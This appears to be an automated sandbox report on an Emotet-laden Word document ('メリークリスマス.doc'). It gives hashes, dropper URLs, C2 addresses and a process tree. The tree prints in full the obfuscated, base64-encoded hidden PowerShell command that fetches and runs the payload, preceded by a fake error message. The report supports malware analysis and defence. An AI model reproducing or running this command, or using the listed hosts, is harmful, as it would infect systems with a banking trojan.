Overview

overview

10

Static

static

8

メリーã...‚¹.doc

windows7_x64

10

メリーã...‚¹.doc

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22-12-2020 00:11

Sharing

Copy URL
Twitter E-mail

General

  • Target

    メリークリスマス.doc

  • Size

    162KB

  • MD5

    71d9aa9f45329b844843dc8ee84abe80

  • SHA1

    064404ffb86f30dd0b1155ba9f61cfaf3cbb2e65

  • SHA256

    d7c3e71d5a6e9b66ffa6d4571a53f986b3c507b32557c0db8d855cd8c7fd1607

  • SHA512

    80410771ae1f979c6a39372ae1f3e045fdffef4e125cd1edf5a800cb13513e636c7daf03489eb796f2e483b7cb97d190239318187c954fd0b8ff7c71d1de6291

Score
10/10
emotetepoch3bankertrojan

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://aktuel.marduk.kim/dooxi-fuel-hf09b/Logs/
exe.dropper

http://braam.com.br/c/oaA7YWWX/
exe.dropper

http://zebaorganics.com/wp-admin/en-US/
exe.dropper

http://friendsofchrist10.com/streamlabs-obs-rarso/SIGNUP/
exe.dropper

http://guojiazui.com/b/y0QnnWbk/
exe.dropper

http://fi.bonitastores.com/n/WUGoZ/
exe.dropper

http://iog.com.cn/css/Sys/

Extracted

Family

emotet
Botnet

Epoch3
C2

172.193.14.201:80

77.89.249.254:443

203.157.152.9:7080

157.245.145.87:443

195.159.28.244:8080

115.79.195.246:80

163.53.204.180:443

88.119.191.111:80

46.105.131.68:8080

110.37.224.243:80

117.2.139.117:443

172.104.46.84:8080

185.142.236.163:443

37.46.129.215:8080

195.201.56.70:8080

2.82.75.215:80

178.33.167.120:8080

8.4.9.137:8080

203.153.216.178:7080

139.59.12.63:8080
rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process ⋅ 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request ⋅ 7 IoCs
  • Loads dropped DLL ⋅ 4 IoCs
  • Drops file in System32 directory ⋅ 2 IoCs
  • Drops file in Windows directory ⋅ 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings ⋅ 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class ⋅ 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener ⋅ 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 6 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 1 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 2 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 27 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\メリークリスマス.doc"
    Drops file in Windows directory
    Modifies Internet Explorer settings
    Modifies registry class
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      PID:1928
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABzAGUAVAAtAGkAdABFAG0AIAAgACgAIgB2ACIAKwAiAEEAUgAiACsAIgBJAEEAIgArACIAYgBMAEUAOgBvAGwAVQAiACsAIgAzAGoAIgApACAAIAAoACAAIABbAHQAeQBQAEUAXQAoACIAewA0AH0AewAyAH0AewAzAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAE8AJwAsACcAUgB5ACcALAAnAEkATwAuAGQAJwAsACcAaQByAGUAYwB0ACcALAAnAFMAWQBTAHQAZQBtAC4AJwApACkAIAA7ACAAIAAgACQAZwBRAEEAVgBJAHoAPQAgAFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBGACAAJwAuAG4ARQBUAC4AJwAsACcARQBwAE8AJwAsACcASQBOAFQAbQBBAE4AQQBHAGUAcgAnACwAJwBZAFMAVABFAG0AJwAsACcAUwBlAFIAdgBpAEMAJwAsACcAcwAnACkAIAAgADsAJABHAGUAcwBzAHoAeABrAD0AKAAnAFEAZQAnACsAKAAnAHIAdAB4ACcAKwAnAGUAdgAnACkAKQA7ACQATQBzAHcAaABkAHUAawA9ACQATgA5AHIAOQBtAGEAZAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASQA2AGkAdgBlADgAawA7ACQATABlADAAXwBiADQAeQA9ACgAJwBSACcAKwAoACcAdwBiACcAKwAnADcAcwBuACcAKQArACcAcwAnACkAOwAgACgAIABHAEUAdAAtAFYAQQByAGkAYQBCAGwAZQAgACgAIgBvAEwAVQAzACIAKwAiAGoAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAEMAYABSAGUAYABBAGAAVABlAGQAYABJAHIAZQBDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBtACcAKwAoACcAbwB3AEsAJwArACcAMAAnACkAKwAnADYAeQAnACsAKAAnAGEAMAA4ACcAKwAnAG0AbwB3ACcAKQArACgAJwBOADQAJwArACcAZwAnACkAKwAnAGQAegAnACsAKAAnAG4AJwArACcAYwBtAG8AdwAnACkAKQAtAGMAcgBlAFAATABBAEMAZQAgACAAKAAnAG0AbwAnACsAJwB3ACcAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAEYAcgB2ADIANwBmAGYAPQAoACcAQQBnACcAKwAoACcAZwAnACsAJwA1AG8AMQBlACcAKQApADsAIAAkAGcAUQBhAFYASQB6ADoAOgAiAFMAYABlAGMAdQBgAFIAaQBUAHkAYABwAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVgBtAGQAcwBmAHcAegA9ACgAJwBHADEAJwArACgAJwBqADEAJwArACcAMAAnACkAKwAnAGgANQAnACkAOwAkAEgAaABfADMAbwBsAGEAIAA9ACAAKAAnAEkAJwArACcANQBuACcAKwAoACcAeQBsACcAKwAnAHUAagBrAF8AJwApACkAOwAkAFoANwB3ADUAbgAwAHMAPQAoACcAQgBmACcAKwAnAGoAYQAnACsAKAAnAGsAdwAnACsAJwAzACcAKQApADsAJABNAGYANwBwAGoANQBtAD0AKAAnAE0AdgAnACsAKAAnAG0AJwArACcAcQBvACcAKQArACcAawBjACcAKQA7ACQASAA0AGsANwA3AGcAegA9ACQASABPAE0ARQArACgAKAAnADEAJwArACcARgAnACsAJwBMACcAKwAoACcASwAwADYAJwArACcAeQBhACcAKwAnADAAOAAxAEYATAAnACsAJwBOACcAKQArACcANAAnACsAKAAnAGcAZAAnACsAJwB6ACcAKQArACgAJwBuACcAKwAnAGMAMQBGAEwAJwApACkAIAAgAC0AYwBSAGUAcABsAEEAQwBlACgAWwBDAGgAYQBSAF0ANAA5ACsAWwBDAGgAYQBSAF0ANwAwACsAWwBDAGgAYQBSAF0ANwA2ACkALABbAEMAaABhAFIAXQA5ADIAKQArACQASABoAF8AMwBvAGwAYQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAE4AbwB4ADQAZABwAG4APQAoACgAJwBGACcAKwAnAHgAZgB5ACcAKQArACcAegBtACcAKwAnAHUAJwApADsAJABKADYAcwByADgAMABpAD0ATgBgAGUAVwAtAG8AYgBgAEoAZQBgAGMAVAAgAE4ARQB0AC4AVwBlAEIAQwBMAEkARQBuAFQAOwAkAFIAOQBoADQAegB5AG8APQAoACgAKAAoACcAaAB0AHQAJwArACcAcAA6AEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAEoAJwArACcAKQAoADMAcwAyACkAKABhACcAKQApACsAJwBrAHQAJwArACcAdQAnACsAJwBlACcAKwAoACcAbAAuAG0AJwArACcAYQAnACkAKwAnAHIAZAAnACsAKAAoACcAdQBrAC4AawBpAG0ASgAnACsAJwApACcAKwAnACgAMwBzADIAJwArACcAKQAoAGQAbwAnACsAJwBvACcAKQApACsAJwB4AGkAJwArACgAKAAnAC0AZgB1AGUAbAAnACsAJwAtAGgAZgAwACcAKwAnADkAJwArACcAYgBKACcAKwAnACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKABMAG8AZwBzAEoAJwArACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACcAKAAnACsAKAAoACcAQABoAHQAdAAnACsAJwBwADoASgApACcAKwAnACgAMwBzADIAKQAoAEoAJwArACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABiAHIAYQBhAG0ALgBjACcAKwAnAG8AJwApACkAKwAoACgAJwBtAC4AYgByAEoAJwArACcAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAnACgAJwArACgAKAAnAGMASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAG8AYQAnACsAJwBBADcAWQAnACkAKwAoACcAVwAnACsAJwBXAFgAJwApACsAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAQABoAHQAdABwACcAKwAnADoASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKABKACkAKAAnACsAJwAzAHMAMgApACgAegAnACkAKQArACcAZQAnACsAKAAnAGIAJwArACcAYQBvAHIAZwBhAG4AJwArACcAaQAnACkAKwAoACcAYwAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtACcAKwAnAEoAJwApACsAKAAoACcAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAHcAJwApACkAKwAoACcAcAAtAGEAZAAnACsAJwBtACcAKQArACgAKAAnAGkAbgBKACkAJwArACcAKAAnACkAKQArACgAKAAnADMAcwAyACkAJwArACcAKABlACcAKwAnAG4ALQBVAFMAJwApACkAKwAoACgAJwBKACcAKwAnACkAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAKAAnADoASgApACgAMwAnACsAJwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACcAKQApACsAKAAnACgAJwArACcAMwBzADIAKQAnACkAKwAnACgAJwArACcAZgAnACsAJwByAGkAJwArACgAKAAnAGUAJwArACcAbgAnACsAJwBkAHMAbwBmAGMAaAByAGkAcwB0ADEAMAAuAGMAbwAnACsAJwBtAEoAKQAoACcAKwAnADMAcwAyACkAJwApACkAKwAnACgAJwArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAZQBhAG0AbAAnACsAJwBhAGIAcwAtACcAKwAnAG8AJwArACcAYgAnACkAKwAnAHMAJwArACcALQByACcAKwAoACcAYQAnACsAJwByAHMAbwBKACcAKQArACcAKQAnACsAKAAoACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAJwArACcAKAAnACsAJwBTAEkARwBOAFUAUAAnACkAKQArACgAKAAnAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAAnACkAKQArACcAdAAnACsAKAAoACcAdAAnACsAJwBwADoASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAZwB1ACcAKwAnAG8AagAnACsAJwBpAGEAJwApACkAKwAoACcAegB1ACcAKwAnAGkALgBjAG8AbQBKACcAKQArACgAKAAnACkAKAAzACcAKwAnAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAJwArACcAKAAnACsAJwBiAEoAKQAoACcAKQApACsAKAAoACcAMwBzADIAKQAoAHkAJwArACcAMABRAG4AbgBXACcAKwAnAGIAawBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACcAKwAnACkAKABAAGgAJwApACkAKwAnAHQAJwArACgAKAAnAHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAJwArACcAcwAyACkAKABmAGkAJwApACkAKwAoACcALgAnACsAJwBiAG8AbgBpACcAKwAnAHQAYQBzACcAKQArACcAdABvACcAKwAoACcAcgBlAHMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACcAKwAnACkAJwArACcAKAAnACsAJwAzAHMAJwArACcAMgApACgAbgBKACkAKAAzAHMAMgAnACsAJwApACgAJwArACcAVwAnACkAKQArACgAJwBVAEcAJwArACcAbwBaAEoAJwApACsAKAAoACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABAACcAKQApACsAJwBoACcAKwAnAHQAJwArACcAdABwACcAKwAoACgAJwA6AEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwAnACsAJwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACcAKwAnACgAaQBvAGcAJwApACkAKwAoACcALgAnACsAJwBjAG8AbQAuACcAKQArACcAYwBuACcAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABjAHMAJwArACcAcwBKACkAJwArACcAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAnACkAJwArACgAKAAnACgAUwAnACkAKQArACgAKAAnAHkAcwBKACcAKwAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwApACkAKQApAC4AIgByAGUAYABQAGwAYQBgAGMARQAiACgAKAAoACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABpAFQAIgAoACQAVwBxAGMAZQBwAHYAcgAgACsAIAAkAE0AcwB3AGgAZAB1AGsAIAArACAAJABPAG8AbQAzAHcAYgA5ACkAOwAkAEMAcQByADcAXwBfADMAPQAoACcAVQAnACsAKAAnAHUAJwArACcAZwB3AHkAJwApACsAJwB5AHQAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHgAZAAwAGIAaQBtACAAaQBuACAAJABSADkAaAA0AHoAeQBvACAAfAAgAHMAbwBSAGAAVAAtAGAATwBgAEIAagBlAGAAQwB0ACAAewBHAEUAdAAtAGAAUgBhAGAATgBgAEQAbwBNAH0AKQB7AHQAcgB5AHsAJABKADYAcwByADgAMABpAC4AIgBkAG8AdwBuAGwAbwBgAEEAYABEAGYASQBgAGwAZQAiACgAJABOAHgAZAAwAGIAaQBtACwAIAAkAEgANABrADcANwBnAHoAKQA7ACQAQQB2AHYAMABpADAAbwA9ACgAJwBYACcAKwAnAHIAagAnACsAKAAnADEAJwArACcAZAB2ADEAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASAA0AGsANwA3AGcAegApAC4AIgBsAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMwA0ADQAMgApACAAewAuACgAJwByAHUAbgBkACcAKwAnAGwAJwArACcAbAAzADIAJwApACAAJABIADQAawA3ADcAZwB6ACwAJwAjADEAJwAuACIAVABPAHMAYABUAHIAaQBgAE4ARwAiACgAKQA7ACQASwB2AGoANgB5ADMAOAA9ACgAJwBBACcAKwAoACcAbQA2AG8AJwArACcANgAnACkAKwAnAHMANwAnACkAOwBiAHIAZQBhAGsAOwAkAEUAMgBhAHIAXwB1AGYAPQAoACcATgAwACcAKwAoACcAcwAxACcAKwAnAGMAMABoACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADgAagBjAGsAbABuAD0AKAAnAFIAJwArACgAJwBrACcAKwAnAGgAdwAnACkAKwAoACcAdAAnACsAJwB1AGIAJwApACkA
    Process spawned unexpected child process
    Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      PID:1512
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      POwersheLL -w hidden -ENCOD IABzAGUAVAAtAGkAdABFAG0AIAAgACgAIgB2ACIAKwAiAEEAUgAiACsAIgBJAEEAIgArACIAYgBMAEUAOgBvAGwAVQAiACsAIgAzAGoAIgApACAAIAAoACAAIABbAHQAeQBQAEUAXQAoACIAewA0AH0AewAyAH0AewAzAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAE8AJwAsACcAUgB5ACcALAAnAEkATwAuAGQAJwAsACcAaQByAGUAYwB0ACcALAAnAFMAWQBTAHQAZQBtAC4AJwApACkAIAA7ACAAIAAgACQAZwBRAEEAVgBJAHoAPQAgAFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBGACAAJwAuAG4ARQBUAC4AJwAsACcARQBwAE8AJwAsACcASQBOAFQAbQBBAE4AQQBHAGUAcgAnACwAJwBZAFMAVABFAG0AJwAsACcAUwBlAFIAdgBpAEMAJwAsACcAcwAnACkAIAAgADsAJABHAGUAcwBzAHoAeABrAD0AKAAnAFEAZQAnACsAKAAnAHIAdAB4ACcAKwAnAGUAdgAnACkAKQA7ACQATQBzAHcAaABkAHUAawA9ACQATgA5AHIAOQBtAGEAZAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASQA2AGkAdgBlADgAawA7ACQATABlADAAXwBiADQAeQA9ACgAJwBSACcAKwAoACcAdwBiACcAKwAnADcAcwBuACcAKQArACcAcwAnACkAOwAgACgAIABHAEUAdAAtAFYAQQByAGkAYQBCAGwAZQAgACgAIgBvAEwAVQAzACIAKwAiAGoAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAEMAYABSAGUAYABBAGAAVABlAGQAYABJAHIAZQBDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBtACcAKwAoACcAbwB3AEsAJwArACcAMAAnACkAKwAnADYAeQAnACsAKAAnAGEAMAA4ACcAKwAnAG0AbwB3ACcAKQArACgAJwBOADQAJwArACcAZwAnACkAKwAnAGQAegAnACsAKAAnAG4AJwArACcAYwBtAG8AdwAnACkAKQAtAGMAcgBlAFAATABBAEMAZQAgACAAKAAnAG0AbwAnACsAJwB3ACcAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAEYAcgB2ADIANwBmAGYAPQAoACcAQQBnACcAKwAoACcAZwAnACsAJwA1AG8AMQBlACcAKQApADsAIAAkAGcAUQBhAFYASQB6ADoAOgAiAFMAYABlAGMAdQBgAFIAaQBUAHkAYABwAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVgBtAGQAcwBmAHcAegA9ACgAJwBHADEAJwArACgAJwBqADEAJwArACcAMAAnACkAKwAnAGgANQAnACkAOwAkAEgAaABfADMAbwBsAGEAIAA9ACAAKAAnAEkAJwArACcANQBuACcAKwAoACcAeQBsACcAKwAnAHUAagBrAF8AJwApACkAOwAkAFoANwB3ADUAbgAwAHMAPQAoACcAQgBmACcAKwAnAGoAYQAnACsAKAAnAGsAdwAnACsAJwAzACcAKQApADsAJABNAGYANwBwAGoANQBtAD0AKAAnAE0AdgAnACsAKAAnAG0AJwArACcAcQBvACcAKQArACcAawBjACcAKQA7ACQASAA0AGsANwA3AGcAegA9ACQASABPAE0ARQArACgAKAAnADEAJwArACcARgAnACsAJwBMACcAKwAoACcASwAwADYAJwArACcAeQBhACcAKwAnADAAOAAxAEYATAAnACsAJwBOACcAKQArACcANAAnACsAKAAnAGcAZAAnACsAJwB6ACcAKQArACgAJwBuACcAKwAnAGMAMQBGAEwAJwApACkAIAAgAC0AYwBSAGUAcABsAEEAQwBlACgAWwBDAGgAYQBSAF0ANAA5ACsAWwBDAGgAYQBSAF0ANwAwACsAWwBDAGgAYQBSAF0ANwA2ACkALABbAEMAaABhAFIAXQA5ADIAKQArACQASABoAF8AMwBvAGwAYQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAE4AbwB4ADQAZABwAG4APQAoACgAJwBGACcAKwAnAHgAZgB5ACcAKQArACcAegBtACcAKwAnAHUAJwApADsAJABKADYAcwByADgAMABpAD0ATgBgAGUAVwAtAG8AYgBgAEoAZQBgAGMAVAAgAE4ARQB0AC4AVwBlAEIAQwBMAEkARQBuAFQAOwAkAFIAOQBoADQAegB5AG8APQAoACgAKAAoACcAaAB0AHQAJwArACcAcAA6AEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAEoAJwArACcAKQAoADMAcwAyACkAKABhACcAKQApACsAJwBrAHQAJwArACcAdQAnACsAJwBlACcAKwAoACcAbAAuAG0AJwArACcAYQAnACkAKwAnAHIAZAAnACsAKAAoACcAdQBrAC4AawBpAG0ASgAnACsAJwApACcAKwAnACgAMwBzADIAJwArACcAKQAoAGQAbwAnACsAJwBvACcAKQApACsAJwB4AGkAJwArACgAKAAnAC0AZgB1AGUAbAAnACsAJwAtAGgAZgAwACcAKwAnADkAJwArACcAYgBKACcAKwAnACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKABMAG8AZwBzAEoAJwArACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACcAKAAnACsAKAAoACcAQABoAHQAdAAnACsAJwBwADoASgApACcAKwAnACgAMwBzADIAKQAoAEoAJwArACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABiAHIAYQBhAG0ALgBjACcAKwAnAG8AJwApACkAKwAoACgAJwBtAC4AYgByAEoAJwArACcAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAnACgAJwArACgAKAAnAGMASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAG8AYQAnACsAJwBBADcAWQAnACkAKwAoACcAVwAnACsAJwBXAFgAJwApACsAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAQABoAHQAdABwACcAKwAnADoASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKABKACkAKAAnACsAJwAzAHMAMgApACgAegAnACkAKQArACcAZQAnACsAKAAnAGIAJwArACcAYQBvAHIAZwBhAG4AJwArACcAaQAnACkAKwAoACcAYwAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtACcAKwAnAEoAJwApACsAKAAoACcAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAHcAJwApACkAKwAoACcAcAAtAGEAZAAnACsAJwBtACcAKQArACgAKAAnAGkAbgBKACkAJwArACcAKAAnACkAKQArACgAKAAnADMAcwAyACkAJwArACcAKABlACcAKwAnAG4ALQBVAFMAJwApACkAKwAoACgAJwBKACcAKwAnACkAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAKAAnADoASgApACgAMwAnACsAJwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACcAKQApACsAKAAnACgAJwArACcAMwBzADIAKQAnACkAKwAnACgAJwArACcAZgAnACsAJwByAGkAJwArACgAKAAnAGUAJwArACcAbgAnACsAJwBkAHMAbwBmAGMAaAByAGkAcwB0ADEAMAAuAGMAbwAnACsAJwBtAEoAKQAoACcAKwAnADMAcwAyACkAJwApACkAKwAnACgAJwArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAZQBhAG0AbAAnACsAJwBhAGIAcwAtACcAKwAnAG8AJwArACcAYgAnACkAKwAnAHMAJwArACcALQByACcAKwAoACcAYQAnACsAJwByAHMAbwBKACcAKQArACcAKQAnACsAKAAoACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAJwArACcAKAAnACsAJwBTAEkARwBOAFUAUAAnACkAKQArACgAKAAnAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAAnACkAKQArACcAdAAnACsAKAAoACcAdAAnACsAJwBwADoASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAZwB1ACcAKwAnAG8AagAnACsAJwBpAGEAJwApACkAKwAoACcAegB1ACcAKwAnAGkALgBjAG8AbQBKACcAKQArACgAKAAnACkAKAAzACcAKwAnAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAJwArACcAKAAnACsAJwBiAEoAKQAoACcAKQApACsAKAAoACcAMwBzADIAKQAoAHkAJwArACcAMABRAG4AbgBXACcAKwAnAGIAawBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACcAKwAnACkAKABAAGgAJwApACkAKwAnAHQAJwArACgAKAAnAHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAJwArACcAcwAyACkAKABmAGkAJwApACkAKwAoACcALgAnACsAJwBiAG8AbgBpACcAKwAnAHQAYQBzACcAKQArACcAdABvACcAKwAoACcAcgBlAHMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACcAKwAnACkAJwArACcAKAAnACsAJwAzAHMAJwArACcAMgApACgAbgBKACkAKAAzAHMAMgAnACsAJwApACgAJwArACcAVwAnACkAKQArACgAJwBVAEcAJwArACcAbwBaAEoAJwApACsAKAAoACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABAACcAKQApACsAJwBoACcAKwAnAHQAJwArACcAdABwACcAKwAoACgAJwA6AEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwAnACsAJwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACcAKwAnACgAaQBvAGcAJwApACkAKwAoACcALgAnACsAJwBjAG8AbQAuACcAKQArACcAYwBuACcAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABjAHMAJwArACcAcwBKACkAJwArACcAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAnACkAJwArACgAKAAnACgAUwAnACkAKQArACgAKAAnAHkAcwBKACcAKwAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwApACkAKQApAC4AIgByAGUAYABQAGwAYQBgAGMARQAiACgAKAAoACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABpAFQAIgAoACQAVwBxAGMAZQBwAHYAcgAgACsAIAAkAE0AcwB3AGgAZAB1AGsAIAArACAAJABPAG8AbQAzAHcAYgA5ACkAOwAkAEMAcQByADcAXwBfADMAPQAoACcAVQAnACsAKAAnAHUAJwArACcAZwB3AHkAJwApACsAJwB5AHQAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHgAZAAwAGIAaQBtACAAaQBuACAAJABSADkAaAA0AHoAeQBvACAAfAAgAHMAbwBSAGAAVAAtAGAATwBgAEIAagBlAGAAQwB0ACAAewBHAEUAdAAtAGAAUgBhAGAATgBgAEQAbwBNAH0AKQB7AHQAcgB5AHsAJABKADYAcwByADgAMABpAC4AIgBkAG8AdwBuAGwAbwBgAEEAYABEAGYASQBgAGwAZQAiACgAJABOAHgAZAAwAGIAaQBtACwAIAAkAEgANABrADcANwBnAHoAKQA7ACQAQQB2AHYAMABpADAAbwA9ACgAJwBYACcAKwAnAHIAagAnACsAKAAnADEAJwArACcAZAB2ADEAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASAA0AGsANwA3AGcAegApAC4AIgBsAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMwA0ADQAMgApACAAewAuACgAJwByAHUAbgBkACcAKwAnAGwAJwArACcAbAAzADIAJwApACAAJABIADQAawA3ADcAZwB6ACwAJwAjADEAJwAuACIAVABPAHMAYABUAHIAaQBgAE4ARwAiACgAKQA7ACQASwB2AGoANgB5ADMAOAA9ACgAJwBBACcAKwAoACcAbQA2AG8AJwArACcANgAnACkAKwAnAHMANwAnACkAOwBiAHIAZQBhAGsAOwAkAEUAMgBhAHIAXwB1AGYAPQAoACcATgAwACcAKwAoACcAcwAxACcAKwAnAGMAMABoACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADgAagBjAGsAbABuAD0AKAAnAFIAJwArACgAJwBrACcAKwAnAGgAdwAnACkAKwAoACcAdAAnACsAJwB1AGIAJwApACkA
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\system32\rundll32.exe
